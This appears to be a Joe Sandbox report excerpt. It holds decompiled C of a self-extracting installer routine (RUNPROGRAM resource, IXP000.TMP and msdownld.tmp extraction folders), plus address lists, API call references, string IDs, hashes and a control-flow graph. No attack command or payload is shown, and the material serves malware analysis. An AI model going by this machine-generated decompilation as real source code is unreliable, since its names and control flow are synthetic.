                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                      				int _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                      				_t2 = E00E7468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                      					_t32 = E00E7468F(_t82, _t109, 1);
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                      							 *0xe79a30 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						_t35 =  *0xe78b3e; // 0x0
                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                      							__eflags =  *0xe78a24; // 0x0
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                      								_t36 = E00E76517(_t82, 0x7d2, 0, E00E73210, 0, 0);
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xe79a30; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t109 = 0xe791e4;
                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0xe791e4);
                                                                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                                                                      										L19:
                                                                                                                                                                                                      										_push(_t82);
                                                                                                                                                                                                      										E00E71781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                      										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                      										if(_v268 <= 0x5a) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                      												__eflags = _t109 - 6;
                                                                                                                                                                                                      												if(_t109 == 6) {
                                                                                                                                                                                                      													L22:
                                                                                                                                                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                      													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L23;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													__eflags = _t109 - 3;
                                                                                                                                                                                                      													if(_t109 != 3) {
                                                                                                                                                                                                      														L23:
                                                                                                                                                                                                      														__eflags = _t109 - 2;
                                                                                                                                                                                                      														if(_t109 != 2) {
                                                                                                                                                                                                      															L28:
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															__eflags = _t66 - 0x41;
                                                                                                                                                                                                      															if(_t66 == 0x41) {
                                                                                                                                                                                                      																L29:
                                                                                                                                                                                                      																_t60 = _t66 + 1;
                                                                                                                                                                                                      																_v268 = _t60;
                                                                                                                                                                                                      																goto L42;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																__eflags = _t66 - 0x42;
                                                                                                                                                                                                      																if(_t66 == 0x42) {
                                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t68 = E00E76952( &_v268);
                                                                                                                                                                                                      																	__eflags = _t68;
                                                                                                                                                                                                      																	if(_t68 == 0) {
                                                                                                                                                                                                      																		goto L28;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                      																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                      																			L30:
                                                                                                                                                                                                      																			_push(0);
                                                                                                                                                                                                      																			_t103 = 3;
                                                                                                                                                                                                      																			_t49 = E00E7597D( &_v268, _t103, 1);
                                                                                                                                                                                                      																			__eflags = _t49;
                                                                                                                                                                                                      																			if(_t49 != 0) {
                                                                                                                                                                                                      																				L33:
                                                                                                                                                                                                      																				_t50 = E00E72630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t50;
                                                                                                                                                                                                      																				if(_t50 != 0) {
                                                                                                                                                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t88 =  &_v268;
                                                                                                                                                                                                      																				E00E7658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                      																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                      																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                      																					__eflags = _t54;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				__eflags = _t54;
                                                                                                                                                                                                      																				if(_t54 != 0) {
                                                                                                                                                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                      																					_push(_t88);
                                                                                                                                                                                                      																					_t109 = 0xe791e4;
                                                                                                                                                                                                      																					E00E71781(0xe791e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                      																					_t101 = 1;
                                                                                                                                                                                                      																					_t59 = E00E75467(0xe791e4, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t59;
                                                                                                                                                                                                      																					if(_t59 != 0) {
                                                                                                                                                                                                      																						goto L45;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t60 = _v268;
                                                                                                                                                                                                      																						goto L42;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t60 = _v268 + 1;
                                                                                                                                                                                                      																					_v265 = 0;
                                                                                                                                                                                                      																					_v268 = _t60;
                                                                                                                                                                                                      																					goto L42;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				_t65 = E00E72630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t67 = E00E7597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                      										_t69 = E00E75467(0xe791e4, 1, 3); // executed
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t82 = 0xe791e4;
                                                                                                                                                                                                      											_t70 = E00E72630(0, 0xe791e4, 1);
                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                      												_t82 = 0xe791e4;
                                                                                                                                                                                                      												_t71 = E00E75467(0xe791e4, 1, 1);
                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                      													goto L45;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													do {
                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                      														_t44 = E00E7597D(_t82, _t101, 1);
                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xe78b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E00E75467(0xe78b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E00E744B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E00E76CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00e755ab
                                                                                                                                                                                                      0x00e755b2
                                                                                                                                                                                                      0x00e755c9
                                                                                                                                                                                                      0x00e755d5
                                                                                                                                                                                                      0x00e755d9
                                                                                                                                                                                                      0x00e75600
                                                                                                                                                                                                      0x00e75605
                                                                                                                                                                                                      0x00e7560a
                                                                                                                                                                                                      0x00e7560c
                                                                                                                                                                                                      0x00e75638
                                                                                                                                                                                                      0x00e75641
                                                                                                                                                                                                      0x00e75643
                                                                                                                                                                                                      0x00e75645
                                                                                                                                                                                                      0x00e75645
                                                                                                                                                                                                      0x00e7564c
                                                                                                                                                                                                      0x00e75652
                                                                                                                                                                                                      0x00e75657
                                                                                                                                                                                                      0x00e75659
                                                                                                                                                                                                      0x00e75696
                                                                                                                                                                                                      0x00e7569c
                                                                                                                                                                                                      0x00e7589f
                                                                                                                                                                                                      0x00e758a7
                                                                                                                                                                                                      0x00e758ac
                                                                                                                                                                                                      0x00e758b3
                                                                                                                                                                                                      0x00e758b5
                                                                                                                                                                                                      0x00e756a2
                                                                                                                                                                                                      0x00e756a2
                                                                                                                                                                                                      0x00e756a8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756ae
                                                                                                                                                                                                      0x00e756ae
                                                                                                                                                                                                      0x00e756b9
                                                                                                                                                                                                      0x00e756bf
                                                                                                                                                                                                      0x00e756c1
                                                                                                                                                                                                      0x00e756f3
                                                                                                                                                                                                      0x00e756f3
                                                                                                                                                                                                      0x00e75705
                                                                                                                                                                                                      0x00e7570a
                                                                                                                                                                                                      0x00e75711
                                                                                                                                                                                                      0x00e75717
                                                                                                                                                                                                      0x00e75724
                                                                                                                                                                                                      0x00e75726
                                                                                                                                                                                                      0x00e75729
                                                                                                                                                                                                      0x00e75730
                                                                                                                                                                                                      0x00e75737
                                                                                                                                                                                                      0x00e7573d
                                                                                                                                                                                                      0x00e75740
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7572b
                                                                                                                                                                                                      0x00e7572b
                                                                                                                                                                                                      0x00e7572e
                                                                                                                                                                                                      0x00e75742
                                                                                                                                                                                                      0x00e75742
                                                                                                                                                                                                      0x00e75745
                                                                                                                                                                                                      0x00e7576b
                                                                                                                                                                                                      0x00e7576b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75747
                                                                                                                                                                                                      0x00e75747
                                                                                                                                                                                                      0x00e7574d
                                                                                                                                                                                                      0x00e7574f
                                                                                                                                                                                                      0x00e75771
                                                                                                                                                                                                      0x00e75771
                                                                                                                                                                                                      0x00e75773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75751
                                                                                                                                                                                                      0x00e75751
                                                                                                                                                                                                      0x00e75753
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75755
                                                                                                                                                                                                      0x00e7575b
                                                                                                                                                                                                      0x00e75760
                                                                                                                                                                                                      0x00e75762
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75764
                                                                                                                                                                                                      0x00e75764
                                                                                                                                                                                                      0x00e75769
                                                                                                                                                                                                      0x00e7577e
                                                                                                                                                                                                      0x00e7577e
                                                                                                                                                                                                      0x00e75781
                                                                                                                                                                                                      0x00e75788
                                                                                                                                                                                                      0x00e7578d
                                                                                                                                                                                                      0x00e7578f
                                                                                                                                                                                                      0x00e757b2
                                                                                                                                                                                                      0x00e757b8
                                                                                                                                                                                                      0x00e757bd
                                                                                                                                                                                                      0x00e757bf
                                                                                                                                                                                                      0x00e757cd
                                                                                                                                                                                                      0x00e757cd
                                                                                                                                                                                                      0x00e757dd
                                                                                                                                                                                                      0x00e757e3
                                                                                                                                                                                                      0x00e757ef
                                                                                                                                                                                                      0x00e757f5
                                                                                                                                                                                                      0x00e757f8
                                                                                                                                                                                                      0x00e7580a
                                                                                                                                                                                                      0x00e7580a
                                                                                                                                                                                                      0x00e757fa
                                                                                                                                                                                                      0x00e75802
                                                                                                                                                                                                      0x00e75802
                                                                                                                                                                                                      0x00e7580d
                                                                                                                                                                                                      0x00e7580f
                                                                                                                                                                                                      0x00e75830
                                                                                                                                                                                                      0x00e75836
                                                                                                                                                                                                      0x00e7583d
                                                                                                                                                                                                      0x00e7584b
                                                                                                                                                                                                      0x00e75851
                                                                                                                                                                                                      0x00e75855
                                                                                                                                                                                                      0x00e7585a
                                                                                                                                                                                                      0x00e7585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7585e
                                                                                                                                                                                                      0x00e7585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7585e
                                                                                                                                                                                                      0x00e75811
                                                                                                                                                                                                      0x00e75817
                                                                                                                                                                                                      0x00e75819
                                                                                                                                                                                                      0x00e7581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7581f
                                                                                                                                                                                                      0x00e75791
                                                                                                                                                                                                      0x00e75797
                                                                                                                                                                                                      0x00e7579c
                                                                                                                                                                                                      0x00e7579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e757a0
                                                                                                                                                                                                      0x00e757a9
                                                                                                                                                                                                      0x00e757ae
                                                                                                                                                                                                      0x00e757b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e757b0
                                                                                                                                                                                                      0x00e7579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75769
                                                                                                                                                                                                      0x00e75762
                                                                                                                                                                                                      0x00e75753
                                                                                                                                                                                                      0x00e7574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75864
                                                                                                                                                                                                      0x00e75864
                                                                                                                                                                                                      0x00e75864
                                                                                                                                                                                                      0x00e75717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756c3
                                                                                                                                                                                                      0x00e756c5
                                                                                                                                                                                                      0x00e756c9
                                                                                                                                                                                                      0x00e756ce
                                                                                                                                                                                                      0x00e756d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756d6
                                                                                                                                                                                                      0x00e756d6
                                                                                                                                                                                                      0x00e756d8
                                                                                                                                                                                                      0x00e756dd
                                                                                                                                                                                                      0x00e756df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756e1
                                                                                                                                                                                                      0x00e756e2
                                                                                                                                                                                                      0x00e756e4
                                                                                                                                                                                                      0x00e756e6
                                                                                                                                                                                                      0x00e756eb
                                                                                                                                                                                                      0x00e756ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e756f3
                                                                                                                                                                                                      0x00e756f3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7586c
                                                                                                                                                                                                      0x00e75878
                                                                                                                                                                                                      0x00e7587e
                                                                                                                                                                                                      0x00e75882
                                                                                                                                                                                                      0x00e75883
                                                                                                                                                                                                      0x00e75889
                                                                                                                                                                                                      0x00e7588e
                                                                                                                                                                                                      0x00e7588e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75896
                                                                                                                                                                                                      0x00e756ed
                                                                                                                                                                                                      0x00e756df
                                                                                                                                                                                                      0x00e756d0
                                                                                                                                                                                                      0x00e756c1
                                                                                                                                                                                                      0x00e756a8
                                                                                                                                                                                                      0x00e7565b
                                                                                                                                                                                                      0x00e7565b
                                                                                                                                                                                                      0x00e7565d
                                                                                                                                                                                                      0x00e75669
                                                                                                                                                                                                      0x00e75669
                                                                                                                                                                                                      0x00e7565f
                                                                                                                                                                                                      0x00e7565f
                                                                                                                                                                                                      0x00e75665
                                                                                                                                                                                                      0x00e75667
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75667
                                                                                                                                                                                                      0x00e7566c
                                                                                                                                                                                                      0x00e75673
                                                                                                                                                                                                      0x00e75678
                                                                                                                                                                                                      0x00e7567a
                                                                                                                                                                                                      0x00e7589b
                                                                                                                                                                                                      0x00e7589b
                                                                                                                                                                                                      0x00e75680
                                                                                                                                                                                                      0x00e75685
                                                                                                                                                                                                      0x00e7568c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7568c
                                                                                                                                                                                                      0x00e7567a
                                                                                                                                                                                                      0x00e7560e
                                                                                                                                                                                                      0x00e75613
                                                                                                                                                                                                      0x00e7561a
                                                                                                                                                                                                      0x00e75620
                                                                                                                                                                                                      0x00e75626
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75626
                                                                                                                                                                                                      0x00e755db
                                                                                                                                                                                                      0x00e755e0
                                                                                                                                                                                                      0x00e755e7
                                                                                                                                                                                                      0x00e755f1
                                                                                                                                                                                                      0x00e755f6
                                                                                                                                                                                                      0x00e755f6
                                                                                                                                                                                                      0x00e755f6
                                                                                                                                                                                                      0x00e758b7
                                                                                                                                                                                                      0x00e758c7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00E755CF
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00E75638
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00E7564C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E75620
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E756B9
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00E7571E
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00E75737
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00E757CD
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00E757EF
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00E75802
                                                                                                                                                                                                        • Part of subcall function 00E72630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00E72654
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00E75830
                                                                                                                                                                                                        • Part of subcall function 00E76517: FindResourceA.KERNEL32(00E70000,000007D6,00000005), ref: 00E7652A
                                                                                                                                                                                                        • Part of subcall function 00E76517: LoadResource.KERNEL32(00E70000,00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E76538
                                                                                                                                                                                                        • Part of subcall function 00E76517: DialogBoxIndirectParamA.USER32(00E70000,00000000,00000547,00E719E0,00000000), ref: 00E76557
                                                                                                                                                                                                        • Part of subcall function 00E76517: FreeResource.KERNEL32(00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E76560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00E75878
                                                                                                                                                                                                        • Part of subcall function 00E7597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00E759A8
                                                                                                                                                                                                        • Part of subcall function 00E7597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00E759AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-559629209
                                                                                                                                                                                                      • Opcode ID: 8c45f617c0db0cd918481224139cb7167052373db317ba7c1d7eb92ef186de36
                                                                                                                                                                                                      • Instruction ID: 0311a8895efcf5c969928848eb2958fb93b48c1ccc7e6ca24638a5a8a69c3039
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c45f617c0db0cd918481224139cb7167052373db317ba7c1d7eb92ef186de36
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83812C72A04A049BDB24EB759C45BEE72AD9F60304F04A4B6F58EF2191EFF08DC58A51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 406 e744b9-e744f8 407 e744fe-e74525 LoadStringA 406->407 408 e74679-e7467b 406->408 410 e74527-e7452e call e7681f 407->410 411 e74562-e74568 407->411 409 e7467c-e7468c call e76ce0 408->409 418 e74530-e7453d call e767c9 410->418 419 e7453f 410->419 413 e7456b-e74570 411->413 413->413 416 e74572-e7457c 413->416 420 e7457e-e74580 416->420 421 e745c9-e745cb 416->421 418->419 425 e74544-e74554 MessageBoxA 418->425 419->425 426 e74583-e74588 420->426 423 e74607-e74617 LocalAlloc 421->423 424 e745cd-e745cf 421->424 429 e7455a-e7455d 423->429 430 e7461d-e74628 call e71680 423->430 428 e745d2-e745d7 424->428 425->429 426->426 431 e7458a-e7458c 426->431 428->428 432 e745d9-e745ed LocalAlloc 428->432 429->409 436 e7462d-e7463d MessageBeep call e7681f 430->436 434 e7458f-e74594 431->434 432->429 435 e745f3-e74605 call e7171e 432->435 434->434 437 e74596-e745ad LocalAlloc 434->437 435->436 445 e7463f-e7464c call e767c9 436->445 446 e7464e 436->446 437->429 440 e745af-e745c7 call e7171e 437->440 440->436 445->446 447 e74653-e74677 MessageBoxA LocalFree 445->447 446->447 447->409
                                                                                                                                                                                                      C-Code - Quality: 94%
